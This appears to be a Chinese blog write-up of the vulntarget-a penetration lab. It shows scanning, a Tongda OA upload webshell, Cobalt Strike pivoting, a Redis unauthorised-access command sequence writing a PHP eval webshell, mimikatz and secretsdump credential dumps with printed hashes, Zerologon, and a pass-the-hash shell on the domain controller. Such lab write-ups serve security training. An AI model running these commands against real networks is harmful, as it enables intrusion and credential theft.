212 字
1 分钟
vulntarget-a

vulntarget-a#

Windows7#

信息收集#

nmap -Pn -sV 192.168.111.20

⚡ root@kali  /home/kali  nmap -Pn -sV 192.168.111.20
Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-19 22:17 +0800
Nmap scan report for 192.168.111.20
Host is up (0.052s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.24 seconds

通达OA文件上传拿到shell#

访问80端口 发现是通达oa系统 直接利用工具检测

image-20260919223319618

上传一句话木马 连接蚁剑

image-20260919223537619

image-20260919223523443

创建cs服务#

使用cs生成后门连接

image-20260919223959876

内网信息收集#

ipconfig

[09/19 22:41:35] beacon> shell ipconfig
[09/19 22:41:36] [*] Tasked beacon to run: ipconfig
[09/19 22:41:37] [+] host called home, sent: 39 bytes
[09/19 22:41:38] [+] received output:
Windows IP 配置
以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::4da1:3d14:4c13:5de3%13
IPv4 地址 . . . . . . . . . . . . : 10.0.20.98
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::d1a2:f1b5:7745:3929%11
IPv4 地址 . . . . . . . . . . . . : 192.168.111.20
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
隧道适配器 isatap.{0EECF21A-AF38-44FF-B9D1-AA7055B9B9AA}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 isatap.{C16C4D2C-F074-4634-A62D-2B70BC241EE5}:
媒体状态 . . . . . . . . . . . . : 媒体已断开
连接特定的 DNS 后缀 . . . . . . . :

端口扫描

[09/19 22:42:44] beacon> portscan 10.0.20.0-10.0.20.255 1-1024,3389,5000-6000 arp 1024
[09/19 22:42:44] [*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 10.0.20.0-10.0.20.255
[09/19 22:42:46] [+] host called home, sent: 93797 bytes
[09/19 22:43:00] [+] received output:
(ARP) Target '10.0.20.98' is alive. 00-50-56-B1-D7-96
(ARP) Target '10.0.20.99' is alive. 00-50-56-B1-BB-5E
[09/19 22:43:17] [+] received output:
10.0.20.99:5985
[09/19 22:43:58] [+] received output:
10.0.20.99:80
[09/19 22:44:04] [+] received output:
10.0.20.98:5357
[09/19 22:44:07] [+] received output:
10.0.20.98:139
10.0.20.98:135
10.0.20.98:110
10.0.20.98:80
[09/19 22:44:09] [+] received output:
10.0.20.98:445 (platform: 500 version: 6.1 name: WIN7-PC domain: WORKGROUP)
Scanner module is complete

我们下一步的目标就是10.0.20.99

windows server 2016#

使用cs建立socks4隧道 然后使用

proxychains nmap -sT -Pn 10.0.20.99进行端口扫描

发现存在redis端口 尝试未授权访问

redis未授权#

config set dir "C:/phpStudy/PHPTutorial/WWW"
config set dbfilename shell.php
set x "<?php @eval($_POST['1']);?>"
save
exit
⚡ root@kali  /mnt/hgfs/Cyber_Security/CTF/无境/内网域渗透/vulntarget-a  proxychains redis-cli -h 10.0.20.99
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain ... 127.0.0.1:31959 ... 10.0.20.99:6379 ... OK
10.0.20.99:6379> config set dir "C:/phpStudy/PHPTutorial/WWW"
OK
10.0.20.99:6379> config set dbfilename shell.php
OK
10.0.20.99:6379> set x "<?php @eval($_POST['1']);?>"
OK
10.0.20.99:6379> save
OK
(0.54s)
10.0.20.99:6379> exit

上线cs#

然后使用蚁剑连接 上传正向后门

image-20260920151349661

执行后上线cs

connect 10.0.20.99 4444

信息收集#

ipconfig

[09/20 15:16:07] beacon> shell ipconfig
[09/20 15:16:07] [*] Tasked beacon to run: ipconfig
[09/20 15:16:07] [+] host called home, sent: 39 bytes
[09/20 15:16:09] [+] received output:
Windows IP 配置
以太网适配器 Ethernet0:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::adef:3dbb:c356:2014%9
IPv4 地址 . . . . . . . . . . . . : 10.0.20.99
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
以太网适配器 Ethernet1:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::5d33:cebb:4b48:b4f7%12
IPv4 地址 . . . . . . . . . . . . : 10.0.10.111
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
隧道适配器 isatap.{A7027029-ECC3-4186-BC98-9DCE01AAA9D0}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :
隧道适配器 Reusable ISATAP Interface {3DA37866-F097-4088-BC52-B3F6873B5E31}:
媒体状态 . . . . . . . . . . . . : 媒体已断开连接
连接特定的 DNS 后缀 . . . . . . . :

端口扫描

[09/20 15:14:30] beacon> portscan 10.0.10.0-10.0.10.255 1-1024,3389,5000-6000 arp 1024
[09/20 15:14:30] [*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 10.0.10.0-10.0.10.255
[09/20 15:14:31] [+] host called home, sent: 93797 bytes
[09/20 15:14:44] [+] received output:
(ARP) Target '10.0.10.111' is alive. 00-50-56-B1-9F-EA
(ARP) Target '10.0.10.110' is alive. 00-50-56-B1-3F-6C
[09/20 15:15:02] [+] received output:
10.0.10.111:5985
[09/20 15:15:05] [+] received output:
10.0.10.111:139
10.0.10.111:135
10.0.10.111:80
10.0.10.110:5985
[09/20 15:15:39] [+] received output:
10.0.10.110:636
[09/20 15:15:41] [+] received output:
10.0.10.110:593
[09/20 15:15:44] [+] received output:
10.0.10.110:464
10.0.10.110:389
[09/20 15:15:46] [+] received output:
10.0.10.110:139
10.0.10.110:135
[09/20 15:15:49] [+] received output:
10.0.10.110:88
[09/20 15:15:51] [+] received output:
10.0.10.110:53
[09/20 15:16:03] [+] received output:
10.0.10.110:445 (platform: 500 version: 10.0 name: WIN2019 domain: VULNTARGET)
10.0.10.111:445 (platform: 500 version: 10.0 name: WIN2016 domain: VULNTARGET)

10.0.10.110

查看域+dc

[09/20 15:16:58] beacon> shell net view /domain
[09/20 15:16:58] [*] Tasked beacon to run: net view /domain
[09/20 15:16:59] [+] host called home, sent: 47 bytes
[09/20 15:17:11] [+] received output:
发生系统错误 6118。
此工作组的服务器列表当前无法使用
[09/20 15:17:20] beacon> shell net time /domain
[09/20 15:17:20] [*] Tasked beacon to run: net time /domain
[09/20 15:17:20] [+] host called home, sent: 47 bytes
[09/20 15:17:21] [+] received output:
\\win2019.vulntarget.com 的当前时间是 2026/9/20 15:17:25
命令成功完成。

确定域名是win2019.vulntarget.com

查看dc

[09/20 15:18:15] beacon> shell ping win2019.vulntarget.com
[09/20 15:18:15] [*] Tasked beacon to run: ping win2019.vulntarget.com
[09/20 15:18:15] [+] host called home, sent: 58 bytes
[09/20 15:18:19] [+] received output:
正在 Ping win2019.vulntarget.com [10.0.10.110] 具有 32 字节的数据:
来自 10.0.10.110 的回复: 字节=32 时间<1ms TTL=128
来自 10.0.10.110 的回复: 字节=32 时间<1ms TTL=128
来自 10.0.10.110 的回复: 字节=32 时间<1ms TTL=128
来自 10.0.10.110 的回复: 字节=32 时间<1ms TTL=128
10.0.10.110 的 Ping 统计信息:
数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
最短 = 0ms,最长 = 0ms,平均 = 0ms

DC IP<10>.0.10.110

抓取密码

[09/20 15:19:24] [*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[09/20 15:19:26] [+] host called home, sent: 788090 bytes
[09/20 15:19:28] [+] received output:
Authentication Id : 0 ; 84475 (00000000:000149fb)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2026/9/20 14:22:30
SID : S-1-5-90-0-1
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : 0012423c9c41e23d774b9d57d21f5043
* SHA1 : 022a554a552592cf3d41f2b24ba1f5c50de5e49c
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : vulntarget.com
* Password : 86 fc 9f 6e 8d 22 8a ad ec 6b 91 25 88 af 2a 95 82 92 47 f4 b4 1f 13 5c e5 0e 81 9b 01 61 89 dc 9d ad 4e 35 a7 d2 ea 55 1f 49 c7 4c a1 e0 fb 0b 92 47 c6 d5 9a 0b 71 e3 95 83 db d5 63 23 d8 b3 fa 93 a6 aa 57 8a bb a0 b6 30 fb 92 40 b1 98 c6 73 2e ef 3a a0 70 1f c2 0a 51 1a 20 be 7b 2f 52 38 fa 98 98 0b 95 7b bf 99 a2 71 a5 02 97 9e 53 b6 1f eb 5f a3 ba 99 fc 5b 01 f0 78 20 69 de 28 3f 06 ba 07 a7 03 39 5d 61 e0 94 3e 4f a6 00 38 bd 79 63 e5 a6 42 52 38 72 44 20 32 af a0 3a 04 3f 35 d5 b8 24 1f 8f ae c0 a6 2b 6b fa 7d c1 c4 74 c7 52 3b ce ca 09 d1 92 dc f2 22 75 10 f3 d9 69 cc 14 21 81 3f 7e 25 10 4b a2 b6 31 f5 f0 d6 5f 3f 5c fd b6 96 07 da df 95 d4 17 2e bd a2 19 53 e3 97 ec a9 27 07 a8 41 b8 75 06 68 4b 20 45
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN2016$
Domain : VULNTARGET
Logon Server : (null)
Logon Time : 2026/9/20 14:22:28
SID : S-1-5-20
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : d5ede5c0b42d5bed437d7771d5e27c72
* SHA1 : 9cc5e8b77d1269baa6580c1f3862576c909b2d2a
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : win2016$
* Domain : VULNTARGET.COM
* Password : 30 d6 b9 cb 97 3c 49 d5 2f 9f ee dd a6 d3 5b e1 aa 72 b6 61 8b da 37 45 ab 6c 6c 19 91 c1 8d 6c 01 1f 16 9e 5a 5a bf 23 2b 0b b0 7f a1 c5 88 b5 d2 c7 ea b6 a8 25 13 8c c1 bc cc 58 e2 a1 d8 27 ee 45 89 a6 6d 84 fc c7 87 e7 e4 f5 ee 79 f1 09 b3 dc 7f 3e 46 6d cf 79 cc 60 86 e9 b2 2b 14 38 37 4e 44 c8 31 93 b5 88 a7 7c e4 66 35 7e dc 5c 9b 79 3e ea ef d0 eb 39 0e b1 ab 7e 10 44 7b 9b 76 7a 4e 57 b6 0d c9 b6 97 03 6d 8f 5d eb c1 5c ac 9c 78 de dd 1b df 11 f0 dc 83 50 8d d4 3a b7 00 0f 86 55 51 c0 d6 da ea 1f 4b aa f9 a9 31 3b ef ed d9 f5 ba 03 fb 54 46 cb 30 69 5f 9a 21 3b 9b 3f 4e 43 6a b4 5e 84 bb 4c 1f 18 79 7a 2c 6b 5b cb 14 9b 2c 78 ff 46 a6 98 87 ee b2 d3 0a 4e 3e 4b 6f 11 17 dc 31 3d 40 f6 f9 0e 80 27 1f 8e
ssp :
credman :
Authentication Id : 0 ; 46265 (00000000:0000b4b9)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2026/9/20 14:22:27
SID :
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : d5ede5c0b42d5bed437d7771d5e27c72
* SHA1 : 9cc5e8b77d1269baa6580c1f3862576c909b2d2a
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 84458 (00000000:000149ea)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2026/9/20 14:22:30
SID : S-1-5-90-0-1
msv :
[00000005] Primary
* Username : WIN2016$
* Domain : VULNTARGET
* NTLM : d5ede5c0b42d5bed437d7771d5e27c72
* SHA1 : 9cc5e8b77d1269baa6580c1f3862576c909b2d2a
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : vulntarget.com
* Password : 30 d6 b9 cb 97 3c 49 d5 2f 9f ee dd a6 d3 5b e1 aa 72 b6 61 8b da 37 45 ab 6c 6c 19 91 c1 8d 6c 01 1f 16 9e 5a 5a bf 23 2b 0b b0 7f a1 c5 88 b5 d2 c7 ea b6 a8 25 13 8c c1 bc cc 58 e2 a1 d8 27 ee 45 89 a6 6d 84 fc c7 87 e7 e4 f5 ee 79 f1 09 b3 dc 7f 3e 46 6d cf 79 cc 60 86 e9 b2 2b 14 38 37 4e 44 c8 31 93 b5 88 a7 7c e4 66 35 7e dc 5c 9b 79 3e ea ef d0 eb 39 0e b1 ab 7e 10 44 7b 9b 76 7a 4e 57 b6 0d c9 b6 97 03 6d 8f 5d eb c1 5c ac 9c 78 de dd 1b df 11 f0 dc 83 50 8d d4 3a b7 00 0f 86 55 51 c0 d6 da ea 1f 4b aa f9 a9 31 3b ef ed d9 f5 ba 03 fb 54 46 cb 30 69 5f 9a 21 3b 9b 3f 4e 43 6a b4 5e 84 bb 4c 1f 18 79 7a 2c 6b 5b cb 14 9b 2c 78 ff 46 a6 98 87 ee b2 d3 0a 4e 3e 4b 6f 11 17 dc 31 3d 40 f6 f9 0e 80 27 1f 8e
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2026/9/20 14:22:30
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN2016$
Domain : VULNTARGET
Logon Server : (null)
Logon Time : 2026/9/20 14:22:26
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN2016$
* Domain : VULNTARGET
* Password : (null)
kerberos :
* Username : win2016$
* Domain : VULNTARGET.COM
* Password : (null)
ssp :
credman :

Windows Server 2019#

抓密码也没有抓到有用的信息 先尝试一下zerologon

image-20260920152824891

利用impact套件

⚡ root@kali  /mnt/hgfs/Cyber_Security/tool/web/Intranet_penetration/横向移动/impacket-0.13.1/examples  proxychains python3 secretsdump.py vulntarget/win2019\$@10.0.10.110 -no-pass
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Dynamic chain ... 127.0.0.1:43347 ... 10.0.10.110:445 ... OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Dynamic chain ... 127.0.0.1:43347 ... 10.0.10.110:135 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:43347 ... 10.0.10.110:49667 ... OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:d5ede5c0b42d5bed437d7771d5e27c72:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:eef6ab2b3b032260d760cfdf9435995c3dc6fee004426759945d5beba39a747d
WIN2016$:aes128-cts-hmac-sha1-96:0dc0e8aded249a7a0529806738100096
WIN2016$:des-cbc-md5:a257c1aeae159da2
[*] Cleaning up...
⚡ root@kali  /mnt/hgfs/Cyber_Security/tool/web/Intranet_penetration/横向移动/impacket-0.13.1/examples  proxychains python3 smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 administrator@10.0.10.110
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies
[proxychains] Dynamic chain ... 127.0.0.1:43347 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>type C:\flag.txt
d8e0961b214ff94e55115eea28cd9073
C:\Windows\system32>

image-20260920153054484

分享

如果这篇文章对你有帮助,欢迎分享给更多人!

vulntarget-a
https://blog.hollowqing.cn/posts/pentest/vulntarget-a/
作者
Hollow
发布于
2026-09-20
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时

目录